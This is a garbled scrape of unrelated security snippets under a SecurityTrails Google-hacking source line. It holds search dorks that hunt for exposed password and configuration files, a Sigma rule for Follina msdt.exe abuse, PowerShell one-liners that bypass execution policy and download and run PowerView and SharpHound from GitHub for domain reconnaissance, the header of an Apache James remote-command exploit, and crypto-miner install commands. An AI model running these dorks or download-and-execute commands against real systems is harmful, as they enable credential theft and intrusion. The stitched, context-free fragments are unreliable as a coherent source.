Original Source: https://securitytrails.com/blog/google-hacking-techniques
Reading time: 12 minutes
Some time ago we wrote an interesting post about the [OSINT](https://securitytrails.com/blog/what
| "admin account info" filetype:log | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
| "AutoCreate=TRUE password=*" | |
| "http://*:*@www" domainname | |
| "index of/" "ws_ftp.ini" "parent directory" | |
| "liveice configuration file" ext:cfg -site:sourceforge.net | |
| "parent directory" +proftpdpasswd | |
| "Duclassified" -site:duware.com "DUware All Rights reserved" | |
| "duclassmate" -site:duware.com |
| title: Suspicious msdt.exe execution - Office Exploit | |
| id: 97a80ed7-1f3f-4d05-9ef4-65760e634f6b | |
| status: experimental | |
| description: This rule will monitor suspicious arguments passed to the msdt.exe process. These arguments are an indicator of recent Office/Msdt exploitation. | |
| references: | |
| - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e | |
| - https://twitter.com/MalwareJake/status/1531019243411623939 | |
| author: 'Matthew Brennan' | |
| tags: | |
| - attack.execution |
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| # | |
| # Copyright 2015, Francesco "dfirfpi" Picasso <[email protected]> | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); | |
| # you may not use this file except in compliance with the License. | |
| # You may obtain a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 |
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| # | |
| # Copyright 2017, Francesco "dfirfpi" Picasso <[email protected]> | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); | |
| # you may not use this file except in compliance with the License. | |
| # You may obtain a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 |
Pre-reqs:
| """An exploit for Apache James 2.3.2 that executes remote commands. | |
| This script creates a new user and enqueues a payload to be executed the next | |
| time a user logs in to the machine. The vulnerability is documented in | |
| CVE-2015-7611. | |
| For more details, see http://www.securityfocus.com/bid/76933 and | |
| https://www.exploit-db.com/exploits/35513/. | |
| """ |
| Run this command to install MG-CLI: | |
| sudo apt-get update && wget https://minergate.com/download/deb-cli -O minergate-cli.deb && sudo dpkg -i minergate-cli.deb | |
| to start miner (4 cores for BCN) use this command: | |
| minergate-cli -user <[email protected]> -bcn 4 | |
| Feel free to send some of your earnings to me: | |
| BTC (Don't attempt to send other coins to this address!): 17f77AYHsQbdsB1Q6BbqPahJ8ZrjFLYH2j |